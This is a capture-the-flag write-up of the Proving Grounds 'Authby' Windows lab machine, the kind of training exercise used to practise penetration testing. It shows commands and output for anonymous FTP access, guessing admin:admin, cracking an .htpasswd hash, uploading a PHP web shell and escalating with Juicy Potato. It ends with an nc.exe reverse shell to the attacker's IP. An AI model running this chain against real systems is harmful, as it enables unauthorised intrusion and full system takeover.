Authby
OSCP Proving Grounds Authby Writeup (windows)
Recon (Enumeration)
Nmap
nmap 192.168.212.46 -sV -sC --min-rate 3000 -p- -Pn
Starting Nmap 7.94 ( https://nmap.org ) at 2023-11-25 00:22 EST
Nmap scan report for 192.168.212.46
Host is up (0.042s latency).
Not shown: 65531 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
21/tcp open ftp zFTPServer 6.0 build 2011-10-17
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| total 9680
| ---------- 1 root root 5610496 Oct 18 2011 zFTPServer.exe
| ---------- 1 root root 25 Feb 10 2011 UninstallService.bat
| ---------- 1 root root 4284928 Oct 18 2011 Uninstall.exe
| ---------- 1 root root 17 Aug 13 2011 StopService.bat
| ---------- 1 root root 18 Aug 13 2011 StartService.bat
| ---------- 1 root root 8736 Nov 09 2011 Settings.ini
| dr-xr-xr-x 1 root root 512 Nov 25 11:43 log
| ---------- 1 root root 2275 Aug 09 2011 LICENSE.htm
| ---------- 1 root root 23 Feb 10 2011 InstallService.bat
| dr-xr-xr-x 1 root root 512 Nov 08 2011 extensions
| dr-xr-xr-x 1 root root 512 Nov 08 2011 certificates
|_dr-xr-xr-x 1 root root 512 Jan 23 2023 accounts
242/tcp open http Apache httpd 2.2.21 ((Win32) PHP/5.3.8)
|_http-server-header: Apache/2.2.21 (Win32) PHP/5.3.8
| http-auth:
| HTTP/1.1 401 Authorization Required\x0D
|_ Basic realm=Qui e nuce nuculeum esse volt, frangit nucem!
|_http-title: 401 Authorization Required
3145/tcp open zftp-admin zFTPServer admin
3389/tcp open ssl/ms-wbt-server?
| ssl-cert: Subject: commonName=LIVDA
| Not valid before: 2023-01-22T09:37:27
|_Not valid after: 2023-07-24T09:37:27
| rdp-ntlm-info:
| Target_Name: LIVDA
| NetBIOS_Domain_Name: LIVDA
| NetBIOS_Computer_Name: LIVDA
| DNS_Domain_Name: LIVDA
| DNS_Computer_Name: LIVDA
| Product_Version: 6.0.6001
|_ System_Time: 2023-11-25T05:23:53+00:00
|_ssl-date: 2023-11-25T05:23:58+00:00; 0s from scanner time.
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
FTP
ftp 192.168.246.46 21
Connected to 192.168.246.46.
220 zFTPServer v6.0, build 2011-10-17 14:25 ready.
Name (192.168.246.46:g0): anonymous
331 User name received, need password.
Password:
230 User logged in, proceed.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||2048|)
150 Opening connection for /bin/ls.
total 9680
---------- 1 root root 5610496 Oct 18 2011 zFTPServer.exe
---------- 1 root root 25 Feb 10 2011 UninstallService.bat
---------- 1 root root 4284928 Oct 18 2011 Uninstall.exe
---------- 1 root root 17 Aug 13 2011 StopService.bat
---------- 1 root root 18 Aug 13 2011 StartService.bat
---------- 1 root root 8736 Nov 09 2011 Settings.ini
dr-xr-xr-x 1 root root 512 Nov 09 13:24 log
---------- 1 root root 2275 Aug 09 2011 LICENSE.htm
---------- 1 root root 23 Feb 10 2011 InstallService.bat
dr-xr-xr-x 1 root root 512 Nov 08 2011 extensions
dr-xr-xr-x 1 root root 512 Nov 08 2011 certificates
dr-xr-xr-x 1 root root 512 Jan 23 2023 accounts
Found an open FTP server Anonymous creds seem to work.
I've also found some interesting users.
ftp> cd accounts
250 CWD Command successful.
ftp> dir
229 Entering Extended Passive Mode (|||2050|)
150 Opening connection for /bin/ls.
total 4
dr-xr-xr-x 1 root root 512 Jan 23 2023 backup
---------- 1 root root 764 Jan 23 2023 acc[Offsec].uac
---------- 1 root root 1032 Nov 09 13:25 acc[anonymous].uac
---------- 1 root root 926 Jan 23 2023 acc[admin].uac
226 Closing data connection.
So now we know there is prob admin offsec and anonymous users available.
Lets try admin:admin to log into ftp!
ftp 192.168.246.46 21
Connected to 192.168.246.46.
220 zFTPServer v6.0, build 2011-10-17 14:25 ready.
Name (192.168.246.46:g0): admin
331 User name received, need password.
Password:
230 User logged in, proceed.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||2078|)
150 Opening connection for /bin/ls.
total 3
-r--r--r-- 1 root root 76 Nov 08 2011 index.php
-r--r--r-- 1 root root 45 Nov 08 2011 .htpasswd
-r--r--r-- 1 root root 161 Nov 08 2011 .htaccess
226 Closing data connection.
ftp> more .htaccess
AuthName "Qui e nuce nuculeum esse volt, frangit nucem!"
AuthType Basic
AuthUserFile c:\\wamp\www\.htpasswd
<Limit GET POST PUT>
Require valid-user
</Limit>
ftp>
ftp> more .ht
.htaccess .htpasswd
ftp> more .htpasswd
offsec:$apr1$oRfRsc/K$UpYpplHDlaemqseM39Ugg0
ftp> ls
ftp: No control connection for command
226 Closing data connection.
ftp> exit Well What do we have here! We're able to login and were able to use some credentials.
I was able to run john on this has and found the password elite
john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt --format=md5crypt
Using default input encoding: UTF-8
Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 256/256 AVX2 8x3])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
elite (?)
1g 0:00:00:00 DONE (2023-11-24 22:48) 10.00g/s 253440p/s 253440c/s 253440C/s 191192..260989
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
Alrighty! Lets move onto Initial access!
Initial Access
You Might have noticed there is a Webserver running at port 242
Lets try our new found credentials here!
Alrighty.
Remember our FTP server?
total 3
-r--r--r-- 1 root root 76 Nov 08 2011 index.php
-r--r--r-- 1 root root 45 Nov 08 2011 .htpasswd
-r--r--r-- 1 root root 161 Nov 08 2011 .htaccess
226 Closing data connection.This is interesting, I know that this webserver is running Apache + php
Maybe we can upload a web shell?
ftp 192.168.212.46 21
Connected to 192.168.212.46.
220 zFTPServer v6.0, build 2011-10-17 14:25 ready.
Name (192.168.212.46:g0): admin
331 User name received, need password.
Password:
230 User logged in, proceed.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> put dradik2.php
local: dradik2.php remote: dradik2.php
229 Entering Extended Passive Mode (|||2063|)
150 File status okay; about to open data connection.
100% |******************************************************************************************************************************************************************************************************************| 7206 70.84 MiB/s 00:00 ETA226 Closing data connection.
7206 bytes sent in 00:00 (285.87 KiB/s)
ftp> exit
221 Goodbye.
Yes We can!
Look How pretty this web shell is!
I was able to retrieve the user flag by navigation to the user account and reading the proof.txt
I upgraded my webshell to a reverse shell and started probing the mcahine.
I spent wayyy too much time here but this is a Windows Server 2008 R1 with 0 patches applied.
Privilege Escalation
I delved into various potato exploits.
Seems like Juicy Potato (x86) was the one that was going to help us escalate privileges.
I attempted MS13-053 but to no avail.
.\MS13-053.exe
--------------------------------------------------
Windows NT/2K/XP/2K3/VISTA/2K8/7/8 EPATHOBJ local ring0 exploit
------------------- taviso () cmpxchg8b com, programmeboy () gmail com ---
[+] NtQueryIntervalProfile () 77538AC8
[+] NtQuerySystemInformation () 77538BC8
[?] NtQuerySystemInformation() => \SystemRoot\system32\ntkrnlpa.exe () 8160A000
[+] Discovered a ret instruction at 8160B31E
[+] Allocated userspace PATHRECORD () 00860000
[+] ->next @ 00860000
[+] ->prev @ 42424242
[+] ->flags @ 0
[+] Searching for an available stub address...
[+] Success, ExploitRecordExit () 0x4065ff40
[+] ->next @ 00000000
[+] ->prev @ 00000000
[+] ->flags @ 1
[+] ExploitRecord () 0xe87020
[+] ->next @ 4065FF40
[+] ->prev @ 8170241C
[+] ->flags @ 17
[+] Creating complex bezier path with 86000
[+] Begin CreateRoundRectRgn cycle
[+] Allocated 263 HRGN objects
[+] Flattening curves...
[!] No luck, run exploit again (it can take several attempts)
[+] Press any key to exit...
C:\wamp\www>.\MS13-053.exe JuicyPotato
I figured i'd give this a try.
C:\wamp\www>.\Juicy.Potato.x86.exe
.\Juicy.Potato.x86.exe
JuicyPotato v0.1
Mandatory args:
-t createprocess call: <t> CreateProcessWithTokenW, <u> CreateProcessAsUser, <*> try both
-p <program>: program to launch
-l <port>: COM server listen port
Optional args:
-m <ip>: COM server listen address (default 127.0.0.1)
-a <argument>: command line argument to pass to program (default NULL)
-k <ip>: RPC server ip address (default 127.0.0.1)
-n <port>: RPC server listen port (default 135)
-c <{clsid}>: CLSID (default BITS:{4991d34b-80a1-4291-83b6-3328366b9097})
-z only test CLSID and print token's user
C:\wamp\www>.\Juicy.Potato.x86.exe -l 1337 -p c:\windows\system32\cmd.exe -t * -c {F87B28F1-DA9A-4F35-8EC0-800EFCF26B83}
.\Juicy.Potato.x86.exe -l 1337 -p c:\windows\system32\cmd.exe -t * -c {F87B28F1-DA9A-4F35-8EC0-800EFCF26B83}
Testing {F87B28F1-DA9A-4F35-8EC0-800EFCF26B83} 1337
COM -> recv failed with error: 10038 Fail. Lets try another CSID
The following doc has a lot of handy CSID's.
So we find a suitable CSID and test!
C:\wamp\www>.\Juicy.Potato.x86.exe -l 1337 -p c:\windows\system32\cmd.exe -t * -c {752073A1-23F2-4396-85F0-8FDB879ED0ED}
.\Juicy.Potato.x86.exe -l 1337 -p c:\windows\system32\cmd.exe -t * -c {752073A1-23F2-4396-85F0-8FDB879ED0ED}
Testing {752073A1-23F2-4396-85F0-8FDB879ED0ED} 1337
....
[+] authresult 0
{752073A1-23F2-4396-85F0-8FDB879ED0ED};NT AUTHORITY\SYSTEM
[+] CreateProcessWithTokenW OK
C:\wamp\www>nc
nc
'nc' is not recognized as an internal or external command,
operable program or batch file.
C:\wamp\www>.\Juicy.Potato.x86.exe -l 1337 -c "{752073A1-23F2-4396-85F0-8FDB879ED0ED}" -p c:\windows\system32\cmd.exe -a "/c c:\wamp\www\nc.exe -e cmd.exe 192.168.45.215 12346" -t *
.\Juicy.Potato.x86.exe -l 1337 -c "{752073A1-23F2-4396-85F0-8FDB879ED0ED}" -p c:\windows\system32\cmd.exe -a "/c c:\wamp\www\nc.exe -e cmd.exe 192.168.45.215 12346" -t *
Testing {752073A1-23F2-4396-85F0-8FDB879ED0ED} 1337
....
[+] authresult 0
{752073A1-23F2-4396-85F0-8FDB879ED0ED};NT AUTHORITY\SYSTEM
[+] CreateProcessWithTokenW OK In the middle I check for nc. Machine didn't have it so I had to upload it and then modify my payload to call for a reverse shell.
We catch the shell and we are now nt authority/system!
Microsoft Windows [Version 6.0.6001]
Copyright (c) 2006 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system
C:\Users>cd Administrator
cd Administrator
C:\Users\Administrator>cd Desktop
cd Desktop
C:\Users\Administrator\Desktop>more proof.txt
more proof.txt
d935e8d5acb71070b29ad5266c11bcb4
GG!
Helpful Links
Last updated
